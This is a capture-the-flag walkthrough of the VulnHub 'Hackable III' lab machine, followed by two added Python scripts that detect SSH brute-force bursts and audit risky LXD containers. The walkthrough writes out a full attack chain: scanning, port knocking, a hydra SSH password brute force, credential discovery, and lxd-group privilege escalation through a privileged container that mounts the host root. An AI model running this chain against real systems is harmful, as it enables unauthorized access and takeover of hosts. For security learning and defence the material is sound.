vulhub Series 74: Hackable III (Very Detailed)

news 2026/4/27 20:01:05
Disclaimer: This article documents solving the Hackable III penetration-testing target machine. All operations were performed in a local, authorized environment. The content is for network security learning and defensive research only; do not use it for any illegal purpose. Readers should comply with the Cybersecurity Law (《网络安全法》) and related laws and regulations, and help keep cyberspace secure.

Environment: https://download.vulnhub.com/hackable/hackable3.ova

I. Information Gathering

1. Detecting the target IP address

```
arp-scan -l    # detect all IP addresses on the current network segment
```

```
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.5
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.1     0a:00:27:00:00:04       (Unknown: locally administered)
192.168.5.2     08:00:27:2f:d8:88       PCS Systemtechnik GmbH
192.168.5.12    08:00:27:79:d5:0f       PCS Systemtechnik GmbH

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.968 seconds (130.08 hosts/sec). 3 responded
```

```
nmap -sP 192.168.5.0/24
```

```
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.5.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 02:53 -0400
Nmap scan report for 192.168.5.1
Host is up (0.00014s latency).
MAC Address: 0A:00:27:00:00:04 (Unknown)
Nmap scan report for 192.168.5.2
Host is up (0.00015s latency).
MAC Address: 08:00:27:2F:D8:88 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.12
Host is up (0.00016s latency).
MAC Address: 08:00:27:79:D5:0F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.5
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 4.41 seconds
```

Target IP: 192.168.5.12

2. Probing the target's open ports

```
nmap -sV -p- 192.168.5.12
```

```
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.5.12
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 02:54 -0400
Nmap scan report for 192.168.5.12
Host is up (0.000095s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.46 ((Ubuntu))
MAC Address: 08:00:27:79:D5:0F (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.80 seconds
```

Ports: 22, 80

3. Directory enumeration

```
dirsearch -u http://192.168.5.12
```

```
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.5.12
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.5.12/_26-03-23_04-21-48.txt

Target: http://192.168.5.12/

[04:21:48] Starting:
[04:21:48] 301 -  309B  - /js  ->  http://192.168.5.12/js/
[04:21:49] 403 -  277B  - /.ht_wsr.txt
[04:21:49] 403 -  277B  - /.htaccess.bak1
[04:21:49] 403 -  277B  - /.htaccess.orig
[04:21:49] 403 -  277B  - /.htaccess.sample
[04:21:49] 403 -  277B  - /.htaccess.save
[04:21:49] 403 -  277B  - /.htaccess_extra
[04:21:49] 403 -  277B  - /.htaccess_sc
[04:21:49] 403 -  277B  - /.htaccessOLD
[04:21:49] 403 -  277B  - /.htaccess_orig
[04:21:49] 403 -  277B  - /.htaccessOLD2
[04:21:49] 403 -  277B  - /.htaccessBAK
[04:21:49] 403 -  277B  - /.htm
[04:21:49] 403 -  277B  - /.html
[04:21:49] 403 -  277B  - /.htpasswd_test
[04:21:49] 403 -  277B  - /.htpasswds
[04:21:49] 403 -  277B  - /.httr-oauth
[04:21:57] 301 -  313B  - /backup  ->  http://192.168.5.12/backup/
[04:21:57] 200 -  458B  - /backup/
[04:21:59] 301 -  313B  - /config  ->  http://192.168.5.12/config/
[04:21:59] 200 -  507B  - /config.php
[04:21:59] 200 -  450B  - /config/
[04:22:00] 301 -  310B  - /css  ->  http://192.168.5.12/css/
[04:22:04] 200 -    3KB - /home.html
[04:22:05] 200 -  454B  - /js/
[04:22:07] 200 -  487B  - /login.php
[04:22:14] 200 -   33B  - /robots.txt
[04:22:14] 403 -  277B  - /server-status
[04:22:14] 403 -  277B  - /server-status/

Task Completed
```

II. Exploitation

1. Information gathering

Open http://192.168.5.12/ and press F12 to view the page source. It reveals an email address and a user, jubiscleudo. There is also /robots.txt/ to visit.

```
<!-- Please, jubiscleudo, don't forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com -->
```

Under /backup/ there is a wordlist, wordlist.txt. Download it with wget:

```
wget http://192.168.5.12/backup/wordlist.txt
```

The content under /config/ (http://192.168.5.12/config/) Base64-decodes to 10000.

There is also something under /css/; decoding it as Brainfuck gives 4444:

```
[-]------------------....
```

The source of login.php (http://192.168.5.12/login.php) references 3.jpg (http://192.168.5.12/3.jpg). Fetching the image and extracting it with steghide gives 65535.

```
# Download the image
wget http://192.168.5.12/3.jpg

# Extract the hidden data
steghide extract -sf 3.jpg

# View the file
cat steganopayload148505.txt
```

```
┌──(root㉿kali)-[~]
└─# wget http://192.168.5.12/3.jpg
--2026-03-23 04:31:49--  http://192.168.5.12/3.jpg
正在连接 192.168.5.12:80... 已连接。
已发出 HTTP 请求正在等待回应... 200 OK
长度61259 (60K) [image/jpeg]
正在保存至: “3.jpg”

3.jpg               100%[]  59.82K  --.-KB/s    用时 0s

2026-03-23 04:31:49 (462 MB/s) - 已保存 “3.jpg” [61259/61259])

┌──(root㉿kali)-[~]
└─# steghide extract -sf 3.jpg
Enter passphrase:
wrote extracted data to "steganopayload148505.txt".

┌──(root㉿kali)-[~]
└─# cat steganopayload148505.txt
porta:65535
```

The port-knocking sequence is presumably 10000, 4444, 65535, and port 22 is also given.

2. Port knocking

```
knock 192.168.5.12 10000 4444 65535

nmap -sV -p- 192.168.5.12
```

```
┌──(root㉿kali)-[~]
└─# knock 192.168.5.12 10000 4444 65535

┌──(root㉿kali)-[~]
└─#

┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.5.12
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 04:39 -0400
Nmap scan report for 192.168.5.12
Host is up (0.00010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.46 ((Ubuntu))
MAC Address: 08:00:27:79:D5:0F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.77 seconds
```

3. SSH brute force

The idea here is to use the wordlist obtained earlier to brute-force the SSH password. Running hydra yields the password onlymy, and the login attempt with it succeeds.

```
hydra -l jubiscleudo -P wordlist.txt 192.168.5.12 ssh
```

```
┌──(root㉿kali)-[~]
└─# hydra -l jubiscleudo -P wordlist.txt 192.168.5.12 ssh
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-23 04:41:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 300 login tries (l:1/p:300), ~19 tries per task
[DATA] attacking ssh://192.168.5.12:22/
[22][ssh] host: 192.168.5.12   login: jubiscleudo   password: onlymy
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-23 04:42:27

┌──(root㉿kali)-[~]
└─#
```

4. SSH login

```
ssh jubiscleudo@192.168.5.12
```

Password: onlymy

```
┌──(root㉿kali)-[~]
└─# ssh jubiscleudo@192.168.5.12
The authenticity of host '192.168.5.12 (192.168.5.12)' can't be established.
ED25519 key fingerprint is: SHA256:eKPnFiq8KwR3xWNP5ZL/aPJYYxGZaCVrzrHIL4rem4
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.5.12' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
jubiscleudo@192.168.5.12's password:
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Mar 23 01:45:15 PM UTC 2026

  System load:  0.0                Memory usage:    45%
  Processes:    112                Usage of /:      19.7% of 23.99GB
  Swap usage:   0%                 Users logged in: 0

There were exceptions while processing one or more plugins. See
/var/log/landscape/sysinfo.log for more information.

0 updates can be installed immediately.
0 of these updates are security updates.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings

Last login: Thu Apr 29 16:19:07 2021 from 192.168.2.106
jubiscleudo@ubuntu20:~$
```

5. Information gathering

A new user, hackable_3, and the password TrOLLED_3 were found.

```
jubiscleudo@ubuntu20:~$ cd /var/www/html/
jubiscleudo@ubuntu20:/var/www/html$ ls
3.jpg   config      css        imagens     js          login.php
backup  config.php  home.html  index.html  login_page  robots.txt
jubiscleudo@ubuntu20:/var/www/html$
jubiscleudo@ubuntu20:/var/www/html$
jubiscleudo@ubuntu20:/var/www/html$
jubiscleudo@ubuntu20:/var/www/html$ cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user root with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', '');
define('DB_NAME', 'hackable');

/* Attempt to connect to MySQL database */
$conexao = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($conexao === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
} else {
}
?>
jubiscleudo@ubuntu20:/var/www/html$
jubiscleudo@ubuntu20:/var/www/html$
jubiscleudo@ubuntu20:/var/www/html$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
hackable_3:x:1000:1000:hackable_3:/home/hackable_3:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
jubiscleudo:x:1001:1001:,,,:/home/jubiscleudo:/bin/bash
jubiscleudo@ubuntu20:/var/www/html$
```

5. Switching user

```
su hackable_3
```

Password: TrOLLED_3

```
jubiscleudo@ubuntu20:/var/www/html$ su hackable_3
Password:
hackable_3@ubuntu20:/var/www/html$ cd
hackable_3@ubuntu20:~$
```

6. lxd privilege escalation

The principle of lxd privilege escalation: download an image, create a container from it, and map a container directory directly onto a directory of the physical host, so that the host's files can be accessed directly from inside the container.

List the images currently on the system:

```
lxc image list
```

On Kali:

```
git clone https://github.com/saghul/lxd-alpine-builder/

ls

python -m http.server 8000
```

On the target machine:

```
cd /tmp

wget http://192.168.5.5:8000/lxd-alpine-builder/alpine-v3.13-x86_64-20210218_0139.tar.gz

wget http://192.168.5.5:8000/lxd-alpine-builder/build-alpine

ls

sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine

sudo ./build-alpine -a i686

lxc image import ./alpine*.tar.gz --alias myimage

lxd init

lxc init myimage mycontainer -c security.privileged=true

lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

lxc start mycontainer

lxc exec mycontainer /bin/sh
```

The techniques in this article apply only to authorized test environments or lawful CTF events. Do not test any system without authorization. The road to security begins with compliance and ends with responsibility.
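Seen from the server side, the hydra run in section II.3 is a burst of failed password attempts for one account from one address, followed by a success. The detector below is an added example, not part of the original walkthrough; the log lines are constructed in the usual OpenSSH auth.log shape, and the threshold, window and year are assumed parameters.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH password-authentication result lines as they appear in auth.log
LINE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<verdict>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+")

def sample_log():
    """Constructed excerpt: 12 rapid failures, then a hit, plus one benign typo."""
    host = "ubuntu20 sshd[2101]:"
    lines = [f"Mar 23 08:41:{29 + i:02d} {host} Failed password for jubiscleudo "
             f"from 192.168.5.5 port {40100 + i} ssh2" for i in range(12)]
    lines.append(f"Mar 23 08:41:45 {host} Accepted password for jubiscleudo "
                 "from 192.168.5.5 port 40150 ssh2")
    lines.insert(3, f"Mar 23 08:41:31 {host} Failed password for hackable_3 "
                    "from 192.168.5.20 port 51000 ssh2")
    lines.append(f"Mar 23 08:41:50 {host} Accepted password for hackable_3 "
                 "from 192.168.5.20 port 51002 ssh2")
    return lines

def detect(lines, threshold=10, window=timedelta(seconds=60), year=2026):
    """Return (kind, user, source) alerts. syslog timestamps carry no year,
    so the caller supplies one (assumed parameter)."""
    recent = defaultdict(deque)          # (user, src) -> recent failure times
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["user"], m["src"])
        q = recent[key]
        while q and ts - q[0] > window:  # drop failures outside the window
            q.popleft()
        if m["verdict"] == "Failed":
            q.append(ts)
            if len(q) == threshold:      # fire once per burst
                alerts.append(("bruteforce", *key))
        elif len(q) >= threshold:        # success landed inside a burst
            alerts.append(("success_after_bruteforce", *key))
            q.clear()
    return alerts

if __name__ == "__main__":
    print(detect(sample_log()))
```

The `success_after_bruteforce` alert is the one to act on: it means the guessed password is valid and the account should be treated as compromised.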
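The principle stated in section II.6 has two auditable sides: which accounts may drive the LXD daemon, and which instances combine `security.privileged=true` with a host path mounted as a disk device. The audit below is an added example, not part of the original walkthrough. It assumes instance data in the JSON shape produced by `lxc list --format json`; the sample inputs are constructed, and the `lxd` group line for hackable_3 is an assumption the page does not show.

```python
import json

# Constructed inputs (not captured from the target): JSON shaped like
# `lxc list --format json`, and /etc/group lines. Assumption: hackable_3 is in lxd.
INSTANCES = json.dumps([
    {"name": "mycontainer",
     "expanded_config": {"security.privileged": "true"},
     "expanded_devices": {
         "root": {"type": "disk", "path": "/", "pool": "default"},
         "mydevice": {"type": "disk", "source": "/", "path": "/mnt/root"}}},
    {"name": "webapp",
     "expanded_config": {},
     "expanded_devices": {
         "root": {"type": "disk", "path": "/", "pool": "default"},
         "data": {"type": "disk", "source": "/srv/webapp", "path": "/data"}}}])
GROUP = "sudo:x:27:\nlxd:x:118:hackable_3\n"
SENSITIVE = ("/etc", "/root", "/home", "/var")   # host trees worth flagging

def host_mounts(inst):
    """Disk devices that pass a host path (not a storage-pool volume) into the instance."""
    devs = inst.get("expanded_devices") or inst.get("devices") or {}
    return {n: d["source"] for n, d in devs.items()
            if d.get("type") == "disk" and "pool" not in d
            and d.get("source", "").startswith("/")}

def audit(instances_json):
    """Return (instance, severity, reason) for each risky host mount."""
    findings = []
    for inst in json.loads(instances_json):
        cfg = inst.get("expanded_config") or inst.get("config") or {}
        privileged = cfg.get("security.privileged") == "true"
        for dev, src in host_mounts(inst).items():
            if src != "/" and not any(src == p or src.startswith(p + "/") for p in SENSITIVE):
                continue
            sev = "critical" if privileged else "high"
            findings.append((inst["name"], sev, f"host {src} mounted via device {dev}"))
    return findings

def lxd_operators(group_text, groups=("lxd",)):
    """Accounts in groups allowed to drive the LXD daemon (supplementary members only)."""
    members = set()
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] in groups:
            members.update(u for u in fields[3].split(",") if u)
    return sorted(members)

if __name__ == "__main__":
    print(audit(INSTANCES), lxd_operators(GROUP))
```

Every account returned by `lxd_operators` should be treated as root-equivalent on the host, so the fix for this box is removing ordinary users from that group rather than blocking individual container settings.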
